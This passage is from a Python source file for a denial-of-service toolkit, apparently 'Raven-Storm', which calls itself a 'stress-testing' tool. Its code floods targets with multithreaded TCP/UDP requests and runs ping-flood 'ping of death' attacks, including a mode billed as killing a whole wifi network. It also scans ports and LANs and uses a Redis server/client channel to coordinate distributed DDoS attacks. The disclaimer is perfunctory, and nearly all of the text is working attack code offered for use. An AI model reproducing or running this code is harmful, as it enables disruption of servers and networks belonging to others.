if verbosed: print("[ONLY 1 or more LEN: %s]" % len(com.split("%s " % comname)))
zw = raw_input("\033[1;32;40m %s: " % label)
if verbosed: print("[Return: %s]" % zw)
return zw
def checkipexists(ip, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((str(ip), int(port)))
if result == 0:
return True
else:
return False
except:
return False
def redisinbackground():
os.system("redis-server > /dev/null")
def hbi(ip):
return(" %s" % socket.gethostbyname(ip))
def speedtest(url):
try:
if not "http" in url or not "://" in url:
url = ("https://%s" % url)
print(" Test starting...")
start = time.time()
response = urllib2.urlopen(url)
webcontent = response.read()
end = time.time()
result = (end - start)
return result
except Exception as e:
return ("Error: %s" % e)
def speedping(ip):
try:
print(" Test starting...")
start = time.time()
os.system("ping -c 1 %s > /dev/null" % ip)
end = time.time()
result = (end - start)
return result
except Exception as e:
return ("Error: %s" % e)
def podtesting(size, target, threads, threadssleep, podinterval, podautodl):
targets = []
feat = ""
if podinterval != 0:
feat += ("-i %s " % podinterval)
if podautodl != 0:
feat += ("-w %s " % podautodl)
if type(target) is list:
targets = target
else:
targets = [target]
target = targets
killcom = ('sudo ping -f -q -s %s %s %s > /dev/null' % (size, feat, target)).replace(" ", " ")
print(killcom)
def layerseventhreadrequest():
global layerseventarget
global layerseveninterval
while True:
try:
urllib2.urlopen(urllib2.Request(str(layerseventarget)))
print("Request was send")
except:
print("Error while trying to request the site")
time.sleep(layerseveninterval)
def layersevenattack(layersevenmethod, layerseventarget, layerseventhreads, layersevensleep):
print(" Starting...")
print(" Stop the attack using: crtl + z")
time.sleep(3)
if layersevenmethod[0] == "REQUEST":
for thread in range(layerseventhreads):
Thread(target="layerseventhreadrequest").start()
time.sleep(layersevensleep)
def pod(size, target, threads, threadssleep, podinterval, podautodl):
print("Running...\n[Enter ctrl + z to stop the attack]")
targets = []
feat = ""
if podinterval != 0:
feat += ("-i %s " % podinterval)
if podautodl != 0:
feat += ("-w %s " % podautodl)
if type(target) is list:
targets = target
else:
targets = [target]
target = ""
for target in targets:
if os.geteuid()==0:
print("Sudo mode.")
killcom = ('sudo ping -f -q -s %s %s %s > /dev/null' % (size, feat, target)).replace(" ", " ")
else:
print("Normal mode.")
killcom = ("ping -q -s %s %s %s > /dev/null" % (size, feat, target)).replace(" ", " ")
if verbosed:
print(killcom)
try:
for i in range(int(threads)):
os.system(killcom)
time.sleep(float(threadssleep))
except KeyboardInterrupt:
os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
except Exception as pingerror:
print("Error.", pingerror)
os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
try:
raw_input("")
os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
except:
#os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
print("Killed.")
def lanscan():
try:
gateways = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
gateways.connect(("8.8.8.8", 80))
gateway = ".".join((gateways.getsockname()[0].split("."))[:len(gateways.getsockname()[0].split(".")) - 1])
gateways.close()
nm.scan(hosts=("%s.0/24" % gateway), arguments="-sP")
lanscandev = [(x, nm[x]['status']['state'], nm[x]["hostnames"][0]["name"], nm[x]["hostnames"][0]["type"]) for x in nm.all_hosts()]
print("Gate way: %s.0" % gateway)
for lanscandevice in lanscandev:
print("%s %s %s %s" % (lanscandevice[0], lanscandevice[1], lanscandevice[2], lanscandevice[3]))
except Exception as e:
print("Error.", e)
def stresstest():
import threading
global threads
global stresstestvar
global stresserror
global runactive
print(" ")
#print("\033[1;32;40mStarting with " + str(threads) + "\033[1;32;40m threads...")
print("\033[1;32;40mTime between: %s" % str(timeforstress))
print("\033[1;32;40mUsing %s threads per round" % str(threads))
#print("\033[1;32;40mStep: " + str(stressstep))
print(" ")
#threads = 1
time.sleep(2)
while True:
if hclient:
try:
if hr.get("running") != "true":
print("Killed by server.")
sys.exit()
except:
print("Killed by server.")
sys.exit()
for w in range(1):
t = threading.Thread(target=ddos)
t.start()
time.sleep(timeforstress)
if stresserror == 'true':
print(" ")
print("\033[1;32;40mStopped at %s threads!" % (str(stresstestvar * threads))) #str(stresstestvar * threads)
print(" ")
runactive = 'false'
sys.exit()
else:
stresstestvar += 1
def scann(targetIP):
print(" ")
try:
for p in range(1, 1500):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
res = sock.connect_ex((targetIP, p))
if res == 0:
print("\033[1;32;40mPort: %s" % str(p))
sock.close()
except Exception:
print("\033[1;32;40mThere was an error.")
sys.exit()
print(" ")
print(" ")
def ddos():
global stresserror
global runactive
#message = (str(messages) * int(rtxt))
autotimer = ""
mesalready = False
message = str("%s rs" % messages)
if not outtxtmute:
print("\033[1;32;40m\nOk!")
#if socketmethod != "udp":
# mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#else:
# mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while runactive == 'true':
if hclient:
try:
if hr.get("running") != "true":
print("Killed by server.")
sys.exit()
except:
print("Killed by server.")
sys.exit()
if listwebtrue == "true":
if listportslist == "true":
for listwebnum, listwebvalue in enumerate(listweblist):
for listportsnum, listportsvalue in enumerate(listportslist):
try:
listwebtext = ("for %s " % listwebvalue)
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((listwebvalue, listportsvalue))
#else:
#mysocket.bind((listwebvalue, listportsvalue))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (listwebvalue, listportsvalue))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess for %s with port %s!" % (listwebvalue, listportsvalue))
time.sleep(sleepy)
except socket.error:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget %s with port %s down!, continuing..." % (listwebvalue, listportsvalue))
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
else:
for listwebnum, listwebvalue in enumerate(listweblist):
try:
listwebtext = ("for %s " % listwebvalue)
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((listwebvalue, port))
else:
mysocket.bind((listwebvalue, port))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (listwebvalue, port))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess for %s!" % listwebvalue)
time.sleep(sleepy)
except socket.error:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget %s down!, continuing..." % listwebvalue)
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
else:
if listportstrue == "true":
for listportsnum, listportsvalue in enumerate(listportslist):
try:
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((ip, listportsvalue))
else:
mysocket.bind((ip, listportsvalue))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (ip, listportsvalue))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess with port %s!" % listportsvalue)
time.sleep(sleepy)
except socket.error:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget with port %s down!, continuing..." % listportsvalue)
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
else:
try:
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((ip, port))
else:
mysocket.bind((ip, port))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (ip, port))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess!")
time.sleep(sleepy)
except socket.error as eee:
if verbosed:
print("\033[1;31;40m\nTarget down!, continuing...", eee)
else:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget down!, continuing...")
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
if int(autostop) != 0:
autoendtime = time.time()
autotimer = (int(autoendtime) - int(autostarttime))
#print(autoendtime)
#print(autostarttime)
#print(autotimer)
if autostop <= autotimer:
print("\033[1;32;0mAuto Stop")
sys.exit()
for i in range(threads):
try:
t = threading.Thread(target=ddos)
t.start()
except:
pass
print("\033[1;32;40m ")
os.system("clear")
print ("""\033[1;32;40m
-----------------------------------------------------------
(っ◔◡◔)っ ♥ RapeStresser ♥
Stress-Testing-Toolkit
Made by HERO-_-HACKERx! MIT 2020
I am not responsible, for your activitys!\n Or errors in the programm!
It is illegal, to use on not owned servers.
----------------------------------------------------------""")
def agreed():
global verbosed
if verbosed:
print("[Check: Agreement]")
print("")
agreement = raw_input("\033[1;32;40mDo you agree to use this tool for legal purposes only? (y/N) ")
if agreement == 'y':
if hserver:
try:
hr.set("agree", "true")
except:
sys.exit()
else:
sys.exit()
print(" ")
def helptext():
print("""\033[1;32;40m
Main:
|-- help = This help message.
|-- update = Update script.
|-- quit/exit = Quit ; Exit.
|-- values = Output all set variables.
|-- >> = Run shell command.
Layer-4:
|
|-- Main commands:
| |-- set port = Set the port.
| |-- set threads = Set the number of threads.
| |-- set ip = Set the IP.
| |-- set web = Set IP of website.
| |-- method = Set attack method: UPD, TCP.
| |-- set sleep = Set waiting time between sends.
| |-- outtxt = Output text enable/disable.
| |-- mute = Do not output connection reply.
| |-- run = To run.
|
|-- Set Send-text:
| |-- set message = Set message.
| |-- set r = Repeat text.
| |-- set mb = Send choosen amount of mb to server.
|
|-- Stress Testing:
| |-- stress = Stress-testing mode.
| |-- st wait = Time between stress tests.
|
|-- Multiple:
| |-- set listip = Use IP list to attack.
| |-- set listweb = Use website list to attack.
| |-- set listport = Attack multiple ports.
|
|-- Automation:
| |-- auto start = Time after Attack should start.
| |-- auto step = Time between next thread to activate.
| |-- auto stop = Time after attack should stop.
Layer-3:
|
|-- Main commands:
| |-- pod target = Set the target.
| |-- pod target list = Set multiple targets.
| |-- pod size = Set packet size.
| |-- pod threads = Threads to use.
| |-- pod sleep = Delay between threads.
| |-- pod interval = Delay between each packet send.
| |-- pod auto stop = Automatically stop attack after x seconds.
| |-- pod run = Run the Ping of Death.
| |-- pod jammer = Kill a whole wifi network, by targeting all.
Scaning:
|
|-- Port scanning:
| |-- get port i = Get port of IP (get port i).
| |-- get port w = Get port of web (get port w).
|
|-- Network scanning:
| |-- lan scan = Get all Ips of Wifi.
|
|-- Domain scanning:
| |-- hbi = Get the IP by host.
| |-- post scan = Get all post variables of a Website.
|
|-- Speed testing:
| |-- speed down = Return the time it needs to open a website.
| |-- speed ping = Return the time it needs to ping an IP.
DDOS:
|
|-- Main commands:
| |-- redis run = Enable the redis server.
| |-- redis run hide = Enable the redis server in background.
| |-- server start = Start a server for clients, to make your attack stronger.
| |-- client connect = Connect your client, to the host server.
| |-- server ip = Set IP of the device hosting Redis.
| |-- server port = Set the port of device hosting Redis. (Should be already set.)
|
|-- First start redis-server by entering redis-server in a new terminal.
|-- First start a server, then connect clients.
Use Fast-Usage and plenty more:
|- Have a look at the official documentation on GitHub.
To stop running attack >>> [Crtl + z]
""")
i = 1
if verbosed:
print("[Set-Check: In case ip,port,threads; argv set - set]")
try:
if "-fd" == sys.argv[1]:
try:
ip = sys.argv[2]
port = int(sys.argv[3])
threads = int(sys.argv[4])
i = 7
agreed()
print("\033[1;32;40mTo stop press: CRTL + z")
time.sleep(3)
for maxthreads, i in enumerate(range(threads)):
try:
t = Thread(target=ddos)
time.sleep(autostep)
t.start()
except:
print("\033[1;32;0mCould not start thread %s." % maxthreads)
except:
print("Could not start dos by given inputs.")
sys.exit()
except:
pass
try:
if "-fp" == sys.argv[1]:
try:
podtarget = sys.argv[2]
podthreads = sys.argv[3]
try:
podsize = int(sys.argv[4])
if podsizezw < podminsize:
print("Size needs to be more than 4kb.")
podsize = 65500
print("Size updated by default to 65500kb.")
elif podsizezw > podmaxsize:
print("Size needs to be less than 65500kb.")
podsize = 65500
print("Size updated by default to 65500kb.")
except:
podsize = 65500
try:
podsleep = float(sys.argv[5])
except:
podsleep = 0
print("Sleep updated by default to 0.")
try:
podinterval = int(sys.argv[6])
except:
podinterval = 0
print("interval updated by default to 0.")
try:
podautodl = int(sys.argv[7])
except:
podautodl = 0
print("Auto stop updated by default to 0.")
agreed()
pod(podsize, podtarget, podthreads, podsleep, podinterval, podautodl)
except:
print("Could not start pod by given inputs.")
sys.exit()
except:
pass
print("""\033[1;32;40m
Main Commands:
|-- help = This help message.
|-- set port = Set the port.
|-- set threads = Set the number of threads.
|-- set ip = Set the IP.
|-- set web = Set IP of website.
|-- method = Set attack method: UPD, TCP.
|-- set sleep = Set waiting time between sends in Seconds.
|-- outtxt = Output text enable/disable.
|-- values = Output all set variables.
|-- run = To run.
|-- update = Update script.
|-- quit/exit = Quit ; Exit
Enter "help" to see >much< more...!
""")
# fast redis
if verbosed:
print("[Set-Check: Redis start using argv]")
print(" ".join(sys.argv))
if 'server start' in " ".join(sys.argv):
print(" ".join(sys.argv).split("server start")[1][1:].split(" ")[:2])
elif 'client connect' in " ".join(sys.argv):
print(" ".join(sys.argv).split("client connect")[1][1:].split(" ")[:2])
else:
print("No QuickRed.")
try:
if 'server start' in " ".join(sys.argv):
argvh = " ".join(sys.argv).split("server start")[1][1:].split(" ")[:2]
try:
argvh[1] = int(argvh[1])
except:
argvh = []
com = ""
try:
try:
hr = redis.Redis(host=argvh[0], port=argvh[1], db=0)
except:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("clid", "1")
hr.set("com", "")
hr.set("onrung", "false")
hserver = True
print("\033[1;32;40m\nServer started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
elif 'client connect' in " ".join(sys.argv):
if hserver:
print("\033[1;32;40m\nCant listen, if already hosting.\n")
else:
argvh = " ".join(sys.argv).split("client connect")[1][1:].split(" ")[:2]
try:
argvh[1] = int(argvh[1])
except:
argvh = []
com = ""
try:
try:
hr = redis.Redis(host=argvh[0], port=argvh[1], db=0)
except:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("com", "")
myclid = str(hr.get("clid"))
hr.set("clid", str(int(myclid) + 1))
hr.set(("clid" + str(myclid)), "0")
hclient = True
print("\033[1;32;40m\nClient started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
except Exception as e:
print(e)
pass
if verbosed:
raw_input("")
if verbosed:
print("[Run: Main-Loop]")
while i < 6:
if verbosed:
print("[Check: client + runmode]")
if hclient and hr.get("onrung") != "true":
try:
# wait till command got
if verbosed:
print("[Continue]")
time.sleep(0.6)
if verbosed:
print("[Check: Command]")
while True:
if hr.get("com") != "":
if verbosed:
print("[Check: client0]")
if hr.get(("clid" + str(myclid))) == "0":
print((">> " + hr.get("com") + "\n"))
com = hr.get("com").lower()
break
if hclient:
if hr.get("onrung") == "true":
if verbosed:
print("[Pass: Run-mode]")
com = "run"
break
if hclient:
if hr.get("onrung") == "true":
if verbosed:
print("[Pass: Run-mode]")
com = "run"
break
time.sleep(0.5)
# continue with getting coms
if verbosed:
print("[Set: Variables by Server]")
print("[Check: done]")
if "help" in com:
com = ""
elif "set port" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
port = int(hr.get("port"))
print(("\033[1;32;40m\nPort updated to: " + str(port) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set threads" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
threads = int(hr.get("threads"))
print(("\033[1;32;40m\nThreads updated to: " + str(threads) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set ip" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
ip = hr.get("ip")
print(("\033[1;32;40m\nIP updated to: " + ip + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set web" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
ip = hr.get("ip")
print(("\033[1;32;40m\nIP updated to: " + ip + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "get port i" in com:
com = ""
elif "get port w" in com:
com = ""
elif "pod target" in com:
com = ""
elif "pod target list" in com:
com = ""
elif "pod threads" in com:
com = ""
elif "pod sleep" in com:
com = ""
elif "pod run" in com:
com = ""
elif "lan scan" in com:
com = ""
elif "hbi" in com:
com = ""
elif "speed down" in com:
com = ""
elif "speed ping" in com:
com = ""
elif "set message" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
messages = hr.get("messages")
print(("\033[1;32;40m\nMessage updated to: " + str(messages) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "update" in com:
com = ""
elif "set r" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
rtxt = int(hr.get("rtxt"))
rtxtzw = int(hr.get("rtxtzw"))
messages = str(hr.get("messages"))
messageszw = str(hr.get("messageszw"))
print(("\033[1;32;40m\nText repeating updated to: " + str(rtxt) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set sleep" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
sleepy = int(hr.get("sleepy"))
print(("\033[1;32;40m\nSleep updated to: " + str(sleepy) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "st wait" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
timeforstress = int(hr.get("timeforstress"))
print(("\033[1;32;40m\nSleep time for stress testing updated to: " + str(timeforstress) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "auto step" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
autostep = int(hr.get("autostep"))
print(("\033[1;32;40m\nAuto step updated to: " + str(autostep) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "auto start" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
autostart = int(hr.get("autostart"))
print(("\033[1;32;40m\nAuto start updated to: " + str(autostart) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "auto stop" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
autostop = int(hr.get("autostop"))
print(("\033[1;32;40m\nAuto stop updated to: " + str(autostop) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set mb" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
setmb = float(hr.get("setmb"))
print(("\033[1;32;40m\nMB updated to: " + str(setmb) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set listweb" in com or "set listip" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
listweblist = hr.get("listweblist")
print(("\033[1;32;40m\nList updated.\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set listport" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
listportslist = hr.get("listportslist")
print(("\033[1;32;40m\nList updated.\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "method" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
listportslist = hr.get("method")
print(("\033[1;32;40m\nMethod updated.\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "server ip" in com or "server port" in com:
com = ""
listwebtrue = hr.get("listwebtrue")
if verbosed:
print("[Done]")
time.sleep(0.2)
except:
try:
print("\033[1;32;40m\nFailed to get command, exit using CTRL + c.\n")
time.sleep(2)
except:
print("1;32;0m")
sys.exit()
else:
if verbosed:
print("[Else]")
if len(runcomonstart) == 0:
try:
com = raw_input("\033[1;32;40m>> ").lower()
except:
print("\033[1;32;0m")
sys.exit()
else:
try:
if verbosed:
print("[%s]" % runcomonstart[0])
com = runcomonstart[0]
print("\033[1;32;40m>> %s" % runcomonstart[0])
runcomonstart.pop(0)
if verbosed:
print(runcomonstart)
except:
print("<Error>")
if verbosed:
print("[Check: Server]")
#pdb.set_trace()
if hserver:
if verbosed:
print("[Continue]")
print("[done: False]")
hr.set("sdone", "false")
if verbosed:
print("[Commands]")
if 'help' in com:
if helphelp == 'true':
os.system('clear')
helptext()
helphelp = 'false'
if 'quit' == com or 'exit' == com or 'q' == com or 'e' == com:
os.system("clear")
print("\033[1;32;0mBye. ^^")
os.system("clear")
print("\033[1;32;0mBye. ^^")
break
i = 7
sys.exit()
elif 'set port' in com:
print(" ")
try:
portt = inporarg("Port", "set port", com)
port = int(portt)
except:
print("Error")
print(" ")
elif 'set threads' in com:
print(" ")
try:
threadss = inporarg("Number of Threads", "set threads", com)
threads = int(threadss)
print(" ")
except:
print(" ")
print("Error")
print(" ")
elif 'set ip' in com:
print(" ")
ip = inporarg("Ip", "set ip", com)
if not "." in ip:
ip = ""
print("Error")
print(" ")
listwebtrue = "false"
elif 'set web' in com:
try:
print(" ")
webtoip = inporarg("Website", "set web", com)
webtoip = webtoip.replace("http://", "")
webtoip = webtoip.replace("https://", "")
print(" ")
webtoiptxt = socket.gethostbyname(webtoip)
ip = webtoiptxt
listwebtrue = "false"
except:
print(" ")
print("Error")
print(" ")
elif 'run' == com:
if ip != "":
if ip != iplisterstandard:
lister = listeradd("ip", ip, lister)
if port != portlisterstandard:
lister = listeradd("port", port, lister)
if threads != threadslisterstandard:
lister = listeradd("threads", threads, lister)
if messages != messageslisterstandard:
lister = listeradd("messages", messages, lister)
if rtxt != rtxtlisterstandard:
lister = listeradd("rtxt", rtxt, lister)
if sleepy != sleepylisterstandard:
lister = listeradd("sleepy", sleepy, lister)
if outtxt != outtxtlisterstandard:
lister = listeradd("outtxt", outtxt, lister)
if outtxtmute != outtxtmutelisterstandard:
lister = listeradd("outtxtmute", outtxtmute, lister)
if socketmethod != socketmethodlisterstandard:
lister = listeradd("method", socketmethod, lister)
if hserver:
if hip != hiplisterstandard:
lister = listeradd("hip", hip, lister)
if hport != hportlisterstandard:
lister = listeradd("hport", hport, lister)
if verbosed:
print(str(lister))
try:
pickle.dump(lister, open("ravenstorm-automated-list.ravenstormlist", "w"))
except:
pass
if checkipexists(ip, port) or com == "run dev":
if verbosed:
print("[Command: Run]")
if hclient:
if verbosed:
print("[Client]")
print("[Reset Agreement]")
try:
hr.set("agree", "false")
except:
print("\nError.\n")
sys.exit()
while True:
try:
if hr.get("agree") == "true":
break
time.sleep(0.2)
except:
print("\nError.\n")
time.sleep(2)
if hserver:
if verbosed:
print("[Server]")
try:
time.sleep(1)
if verbosed:
print("[Set Variables]")
hr.set("com", "")
hr.set("onrung", "true")
hr.set("running", "true")
except:
print("\nError.\n")
sys.exit()
if raw_input("\nAlso use server as ddos/dos? (y/n) ") != "y":
if verbosed:
print("[Agreement]")
agreed()
raw_input("[Press Enter to stop attack]")
try:
if verbosed:
print("[Running: False]")
hr.set("running", "false")
except:
print("\nError.")
print("Please kill it manualy.\n")
else:
if verbosed:
print("[Else]")
agreed()
print("To stop: End Redis using CRTL + z ")
time.sleep(3)
time.sleep(autostart)
if stress == 'true':
i = 8
if listwebtrue == "false" and listportstrue == "false":
stresstest()
else:
print("Dont use multiple targets/ports in the Stress-testing mode.")
else:
if autostop != 0:
autostarttime = time.time()
i = 8
for maxthreads, i in enumerate(range(threads)):
try:
t = Thread(target=ddos)
time.sleep(autostep)
t.start()
except:
print("\033[1;32;0mCould not start thread %s." % maxthreads)
else:
if verbosed:
print("['Normal']")
if not hclient:
agreed()
print("\033[1;32;40mTo stop press: CRTL + z")
time.sleep(3)
time.sleep(autostart)
if stress == 'true':
if listwebtrue == "false" and listportstrue == "false":
stresstest()
else:
print("Dont use multiple targets/ports in the Stress-testing mode.")
else:
if autostop != 0:
autostarttime = time.time()
i = 8
for maxthreads, i in enumerate(range(threads)):
try:
t = Thread(target=ddos)
time.sleep(autostep)
t.start()
except:
print("\033[1;32;0mCould not start thread %s." % maxthreads)
else:
print("\nTarget does not exit.\n")
else:
print("\nNo ip set.\n")
elif 'get port i' in com:
try:
print(" ")
psi = inporarg("Ip", "get port i", com)
scann(psi)
except:
print("Error")
print(" ")
elif 'get port w' in com:
try:
print(" ")
psw = inporarg("Website", "get port w", com)
psww = socket.gethostbyname(psw)
scann(psww)
except:
print(" ")
print("Error")
print(" ")
elif 'set message' in com:
print(" ")
messages = inporarg("Message", "set message", com)
rtxt = 1
print(" ")
elif 'update' in com:
try:
os.system("rm -i %s" % sys.argv[0])
wget.download("https://github.com/Taguar258/Raven-Storm/blob/master/rs.pyo?raw=true")
os.system("mv rs.pyo?raw=true %s" % sys.argv[0])
except:
print("Error.")
sys.exit()
elif 'set r' in com:
print(" ")
try:
rtxtzw = rtxt
rtxt = int(inporarg("Number to Repeat", "set r", com))
if rtxt < 1:
print("Error.")
else:
if rtxtzw < rtxt:
messageszw = messages
messages = (str(messages) * int(rtxt))
else:
messages = (str(messageszw) * int(rtxt))
except:
print("Error.")
print(" ")
elif 'outtxt' in com:
print(" ")
if outtxt == 'true':
print("\033[1;32;40mdisabled")
outtxt = "false"
else:
print("\033[1;32;40menabled")
outtxt = 'true'
print(" ")
elif 'mute' in com:
print(" ")
if outtxtmute == True:
print("\033[1;32;40mdisabled")
outtxtmute = False
outtxt = zwouttxt
else:
print("\033[1;32;40menabled")
zwouttxt = outtxt
outtxt = "false"
outtxtmute = True
print(" ")
elif "method" in com:
print("")
if socketmethod == "udp":
socketmethod = "tcp"
print("\033[1;32;40mMethod: TCP")
else:
socketmethod = "udp"
print("\033[1;32;40mMethod: UDP")
print("")
elif 'bywho' in com:
print(" Taguar258")
elif 'values' in com or 'ls' == com:
print("")
print(" Basic:")
if listwebtrue == "true":
print(" List: %s" % str(listweblist))
else:
print(" Ip: %s" % str(ip))
if listportstrue == "true":
print(" Port: %s" % str(listportslist))
else:
print(" Port: %s" % str(port))
print(" Threads: %s" % str(threads))
print("\n Advanced:")
if len(messages) > 40:
print(" Message: %s ..." % str(messages[:40]))
else:
print(" Message: %s" % str(messages))
print(" Repeat: %s" % str(rtxt))
print(" Success output: %s" % str(outtxt))
print(" Hide output: %s" % str(outtxtmute))
print(" Sleep: %s" % str(sleepy))
print(" Method: %s" % str(socketmethod.upper()))
print(" Stress-testing: %s" % str(stress))
print(" Stress delay: %s" % str(timeforstress))
print(" Next thread delay: %s" % str(autostep))
print(" Activation delay: %s" % str(autostart))
print(" Force stop delay: %s" % str(autostop))
print(" Mb send to server: %s" % str(float(sys.getsizeof(str(messages)) / 1000000)))
print(" Server ip: %s" % str(hip))
print(" Server port: %s" % str(hport))
print(" Server: %s" % str(hserver))
print(" Client: %s" % str(hclient))
print(" Pod Packet size: %s kb" % podsize)
print(" Pod targets: %s" % podtarget)
print(" Pod threads: %s" % podthreads)
print(" Pod delay: %s" % podsleep)
print(" Pod interval: %s" % podinterval)
print(" Pod auto stop: %s" % podautodl)
print(" Version: %s" % str(rsversion))
print(" Command script got: %s" % str(sys.argv))
print("")
elif 'dev redis' in com:
print("")
try:
os.system("for key in $(redis-cli -p " + str(hport) + " keys \*); do echo \"Key : '$key'\" ; redis-cli -p " + str(hport) + " GET $key; done")
except:
print("Error.")
print("")
elif 'set sleep' in com:
try:
print(" ")
sleepy = int(inporarg("Time in Seconds", "set sleep", com))
print(" ")
except:
print(" ")
print("Error")
print(" ")
elif 'stress' in com:
print(" ")
if stress == 'true':
print("\033[1;32;40mdisabled")
stress = "false"
else:
print("\033[1;32;40menabled")
stress = 'true'
print(" ")
elif 'st wait' in com:
print(" ")
timeforstress = inporarg("Time between tests in Seconds", "st wait", com)
try:
timeforstress = int(timeforstress)
except:
print("Error")
print(" ")
elif 'auto step' in com:
print(" ")
try:
autostep = inporarg("Time for next thread to activate in Seconds", "auto step", com)
autostep = int(autostep)
except:
print("Error")
print(" ")
elif 'auto start' in com:
print(" ")
try:
autostart = inporarg("Time for attack to start in Seconds", "auto start", com)
autostart = int(autostart)
except:
print("Error")
print(" ")
elif "pod auto stop" in com:
print(" ")
try:
podautodl = int(inporarg("Auto stop", "pod auto stop", com))
except:
print("Error.")
print(" ")
elif 'auto stop' in com:
print(" ")
try:
autostop = inporarg("Seconds for autostop attack", "auto stop", com)
autostop = int(autostop)
except:
print("Error")
print(" ")
elif 'set mb' in com:
print(" ")
try:
print("Rarely crashing if value too high.")
setmb = inporarg("Mb to send to target", "set mb", com)
setmb = int(setmb)
setmb = int(setmb / 0.000001)
messages = ("r" * setmb)
rtxt = setmb
messageszw = "r"
except Exception as ee:
print("Error", ee)
print(" ")
elif 'set listweb' in com:
try:
print("")
listweblist = inporarg('WebList split by ", "', "set listweb", com).split(', ')
for listnum, listvalue in enumerate(listweblist):
listweblist[listnum] = listweblist[listnum].replace("http://","")
listweblist[listnum] = listweblist[listnum].replace("https://","")
listweblist[listnum] = socket.gethostbyname(listweblist[listnum])
listwebtrue = "true"
print(listweblist)
except:
print("\033[1;32;40m\nError.\n")
print("")
#print("#")
elif 'set listip' in com:
try:
print("")
listweblist = inporarg('IPList split by ", "', "set listip", com).split(', ')
listwebtrue = "true"
#print(listweblist)
except:
print("Error")
#print("#")
print("")
elif 'set listport' in com:
try:
print("")
